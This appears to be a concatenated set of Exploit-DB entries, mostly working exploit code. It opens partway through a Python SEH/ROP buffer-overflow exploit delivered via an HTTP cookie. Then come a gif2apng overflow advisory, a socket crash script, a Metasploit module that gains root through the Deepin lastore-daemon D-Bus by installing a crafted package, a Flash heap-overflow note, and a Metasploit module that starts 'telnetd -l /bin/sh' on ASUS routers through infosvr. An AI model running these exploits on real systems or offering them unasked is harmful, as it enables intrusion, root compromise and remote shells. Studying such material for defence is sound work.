buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
# ECX = lpOldProtect (ptr to W address)
buffer += struct.pack('<L', 0x1001b377) # POP ECX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c730ad) # &Writable location [sqlite3.dll]
# EBX = dwSize (0x00000501)
buffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0xfffffaff) # will become 0x00000501 after negate
buffer += struct.pack('<L', 0x100231d1) # NEG EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x1001da09) # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll]
buffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll]
buffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c730ad) # &Writable location [sqlite3.dll]
# EDI = ROP NOP (RETN)
buffer += struct.pack('<L', 0x10019f47) # POP EDI # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll]
# EAX = NOP (0x90909090)
buffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x90909090) # nop
buffer += struct.pack('<L', 0x100240c2) # PUSHAD # RETN [ImageLoad.dll]
buffer += "\x90" * 50 # nop
buffer += shellcode # calc.exe
buffer += "\x90" * 50 # nop
buffer += '\x45' * (1412-(4*88)+128-len(shellcode)-100)
buffer += '\x42' * 4 # nSEH filler
# stack pivot that will land somewhere in buffer of As
buffer += struct.pack('<L', 0x10022869) # SEH ADD ESP,1004 # RETN [ImageLoad.dll]
buffer += '\x44' * (5000-4059-4-4)
print "[+] Sending %s bytes of evil payload.." %len(buffer)
time.sleep(1)
try:
cookies = dict(SESSIONID='6771', UserID=buffer,PassWD='')
data=dict(frmLogin='',frmUserName='',frmUserPass='',login='')
requests.post('http://'+host+':'+port+'/forum.ghp',cookies=cookies,data=data)
except:
print "The server stopped responding. You should see calc.exe by now ;D"
# Exploit Title: gif2apng 1.9 '.gif' Stack-Buffer Overflow
# Date: 20 April 2018
# Exploit Author: Hamm3r.py
# Vendor Homepage: http://gif2apng.sourceforge.net/
# Version: 1.9
# Tested on: Ubuntu 16.04
# CVE :
gif2apng is vulnerable to a stack based buffer overflow when a malformed
gif is supplied. Following is the stack trace:
$ ./gif2apng fuzz.gif
gif2apng 1.9 using 7ZIP with 15 iterations
Reading 'fuzz.gif'...
=================================================================
==3674==ERROR: AddressSanitizer: stack-buffer-overflow on address
0x7fffb183bcf1 at pc 0x0000004ebdce bp 0x7fffb1837a90 sp
0x7fffb1837a88
WRITE of size 1 at 0x7fffb183bcf1 thread T0
#0 0x4ebdcd (/home/shyam/FUZZ/gif2apng+0x4ebdcd)
#1 0x4ee926 (/home/shyam/FUZZ/gif2apng+0x4ee926)
#2 0x7f4e5642282f (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#3 0x4199a8 (/home/shyam/FUZZ/gif2apng+0x4199a8)
Address 0x7fffb183bcf1 is located in stack of thread T0 at offset 16977 in frame
#0 0x4eb23f (/home/shyam/FUZZ/gif2apng+0x4eb23f)
This frame has 6 object(s):
[32, 36) 'size'
[48, 8242) 'prefix'
[8512, 12609) 'suffix'
[12880, 16977) 'str' <== Memory access at offset 16977 overflows
this variable
[17248, 18272) 'data'
[18400, 18401) 'mincodesize'
HINT: this may be a false positive if your program uses some custom
stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow
(/home/shyam/FUZZ/gif2apng+0x4ebdcd)
Shadow bytes around the buggy address:
0x1000762ff740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000762ff750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000762ff760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000762ff770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000762ff780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x1000762ff790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[01]f2
0x1000762ff7a0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
0x1000762ff7b0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
0x1000762ff7c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000762ff7d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000762ff7e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==3674==ABORTING
Version of software in use:
./gif2apng
gif2apng 1.9
#This issue is identified by Hamm3r.py, a general purpose fuzzer!
https://github.com/0xshyam/hamm3r.py
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44519.zip
#!/usr/bin/python
import socket
import sys
from struct import pack
try:
server = sys.argv[1]
port = 9121
size = 1000
inputBuffer = b"\x41" * size
header = b"\x75\x19\xba\xab"
header += b"\x03\x00\x00\x00"
header += b"\x00\x40\x00\x00"
header += pack('<I', len(inputBuffer))
header += pack('<I', len(inputBuffer))
header += pack('<I', inputBuffer[-1])
buf = header + inputBuffer
print("Sending evil buffer...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
s.send(buf)
s.close()
print("Done!")
except socket.error:
print("Could not connect!")
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'lastore-daemon D-Bus Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges on Deepin Linux systems
by using lastore-daemon to install a package.
The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any
user in the sudo group to install arbitrary system packages without
providing a password, resulting in code execution as root. By default,
the first user created on the system is a member of the sudo group.
This module has been tested successfully with lastore-daemon version
0.9.53-1 on Deepin Linux 15.5 (x64).
},
'License' => MSF_LICENSE,
'Author' =>
[
"King's Way", # Discovery and exploit
'Brendan Coles' # Metasploit
],
'DisclosureDate' => 'Feb 2 2016',
'References' =>
[
[ 'EDB', '39433' ],
[ 'URL', 'https://gist.github.com/bcoles/02aa274ce32dc350e34b6d4d1ad0e0e8' ],
],
'Platform' => 'linux',
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'DefaultTarget' => 0))
register_options([
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
])
end
def base_dir
datastore['WritableDir']
end
def mkdir(path)
vprint_status "Creating '#{path}' directory"
cmd_exec "mkdir -p #{path}"
register_dir_for_cleanup path
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end
def upload_and_chmodx(path, data)
upload path, data
cmd_exec "chmod +x '#{path}'"
end
def command_exists?(cmd)
cmd_exec("command -v #{cmd} && echo true").include? 'true'
end
def dbus_priv?
res = install_package '', ''
(res.include? 'DBus.Error.AccessDenied') ? false : true
end
def install_package(name, path)
dbus_send dest: 'com.deepin.lastore',
type: 'method_call',
path: '/com/deepin/lastore',
interface: 'com.deepin.lastore.Manager.InstallPackage',
contents: "string:'#{name}' string:'#{path}'"
end
def remove_package(name)
dbus_send dest: 'com.deepin.lastore',
type: 'method_call',
path: '/com/deepin/lastore',
interface: 'com.deepin.lastore.Manager.RemovePackage',
contents: "string:' ' string:'#{name}'"
end
def dbus_send(dest:, type:, path:, interface:, contents:)
cmd_exec "dbus-send --system --print-reply --dest=#{dest} --type=#{type} #{path} #{interface} #{contents}"
end
def check
%w(lastore-daemon dpkg-deb dbus-send).each do |cmd|
unless command_exists? cmd
vprint_error "#{cmd} is not installed. Exploitation will fail."
return CheckCode::Safe
end
vprint_good "#{cmd} is installed"
end
unless dbus_priv?
vprint_error 'User is not permitted to install packages. Exploitation will fail.'
return CheckCode::Safe
end
vprint_good 'User is permitted to install packages'
CheckCode::Appears
end
def exploit
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
if check != CheckCode::Appears
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
print_status 'Building package...'
payload_name = ".#{rand_text_alphanumeric rand(10..15)}"
payload_path = "#{base_dir}/#{payload_name}"
pkg_name = rand_text_alphanumeric rand(10..15)
pkg_path = "#{base_dir}/.#{pkg_name}"
mkdir "#{pkg_path}/DEBIAN"
pkg = "Package: #{pkg_name}\n"
pkg << "Version: 0.1\n"
pkg << "Maintainer: #{pkg_name}\n"
pkg << "Architecture: all\n"
pkg << "Description: #{pkg_name}\n"
upload "#{pkg_path}/DEBIAN/control", pkg
upload_and_chmodx "#{pkg_path}/DEBIAN/postinst", "#!/bin/sh\n#{payload_path} &"
cmd_exec "dpkg-deb --build '#{pkg_path}'"
unless file_exist? "#{pkg_path}.deb"
fail_with Failure::Unknown, 'Building package failed'
end
print_status 'Uploading payload...'
upload_and_chmodx payload_path, generate_payload_exe
print_status 'Installing package...'
res = install_package pkg_name, "#{pkg_path}.deb"
vprint_line res
unless res.include? 'object path'
fail_with Failure::Unknown, 'Package installation failed. Check /var/log/lastore/daemon.log'
end
Rex.sleep 15
print_status 'Removing package...'
res = remove_package pkg_name.downcase
vprint_line res
unless res.include? 'object path'
print_warning 'Package removal failed. Check /var/log/lastore/daemon.log'
end
end
end
The attached fuzzed swf file causes heap overflow when playing a sound.
This PoC crashes a little bit unreliably, it is the most reliable in the standalone Flash player and Microsoft Edge.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44526.zip
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'ASUS infosvr Auth Bypass Command Execution',
'Description' => %q{
This module exploits an authentication bypass vulnerability in the
infosvr service running on UDP port 9999 on various ASUS routers to
execute arbitrary commands as root.
This module launches the BusyBox Telnet daemon on the port specified
in the TelnetPort option to gain an interactive remote shell.
This module was tested successfully on an ASUS RT-N12E with firmware
version 2.0.0.35.
Numerous ASUS models are reportedly affected, but untested.
},
'Author' =>
[
'Friedrich Postelstorfer', # Initial public disclosure and Python exploit
'jduck', # Independent discovery and C exploit
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
],
'License' => MSF_LICENSE,
'Platform' => 'unix',
'References' =>
[
['CVE', '2014-9583'],
['EDB', '35688'],
['URL', 'https://github.com/jduck/asus-cmd']
],
'DisclosureDate' => 'Jan 4 2015',
'Privileged' => true,
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find'
}
},
'Targets' => [['Automatic', {}]],
'DefaultTarget' => 0))
register_options [
Opt::RPORT(9999),
OptInt.new('TelnetPort', [true, 'The port for Telnetd to bind', 4444]),
OptInt.new('TelnetTimeout', [true, 'The number of seconds to wait for connection to telnet', 10]),
OptInt.new('TelnetBannerTimeout', [true, 'The number of seconds to wait for the telnet banner', 25])
]
register_advanced_options [
# If the session is killed (CTRL+C) rather than exiting cleanly,
# the telnet port remains open, but is unresponsive, and prevents
# re-exploitation until the device is rebooted.
OptString.new('CommandShellCleanupCommand', [true, 'A command to run before the session is closed', 'exit'])
]
end
def telnet_timeout
(datastore['TelnetTimeout'] || 10)
end
def telnet_port
datastore['TelnetPort']
end
def request(cmd)
pkt = ''
# ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO
pkt << "\x0C"
# PacketType [byte] ; NET_PACKET_TYPE_CMD
pkt << "\x15"
# OpCode [word] ; NET_CMD_ID_MANU_CMD
pkt << "\x33\x00"
# Info [dword] ; Comment: "Or Transaction ID"
pkt << Rex::Text.rand_text_alphanumeric(4)
# MacAddress [byte[6]] ; Double-wrongly "checked" with memcpy instead of memcmp
pkt << Rex::Text.rand_text_alphanumeric(6)
# Password [byte[32]] ; Not checked at all
pkt << "\x00" * 32
# Command Length + \x00 + Command padded to 512 bytes
pkt << ([cmd.length].pack('C') + "\x00" + cmd).ljust((512 - pkt.length), "\x00")
end
def exploit
connect_udp
print_status "#{rhost} - Starting telnetd on port #{telnet_port}..."
udp_sock.put request "telnetd -l /bin/sh -p #{telnet_port}"
disconnect_udp
vprint_status "#{rhost} - Waiting for telnet service to start on port #{telnet_port}..."
Rex.sleep 3
vprint_status "#{rhost} - Connecting to #{rhost}:#{telnet_port}..."
sock = Rex::Socket.create_tcp 'PeerHost' => rhost,
'PeerPort' => telnet_port,
'Context' => { 'Msf' => framework, 'MsfExploit' => self },
'Timeout' => telnet_timeout
if sock.nil?
fail_with Failure::Unreachable, "Telnet service unreachable on port #{telnet_port}"
end
vprint_status "#{rhost} - Trying to establish a telnet session..."
prompt = negotiate_telnet sock
if prompt.nil?
sock.close
fail_with Failure::Unknown, 'Unable to establish a telnet session'
end
print_good "#{rhost} - Telnet session successfully established..."
handler sock
end
def negotiate_telnet(sock)
prompt = '#'
Timeout.timeout(datastore['TelnetBannerTimeout']) do
while true
data = sock.get_once(-1, telnet_timeout)
if !data or data.length == 0
return nil
elsif data.include? prompt
return true
end
end
end
rescue ::Timeout::Error
return nil
end
end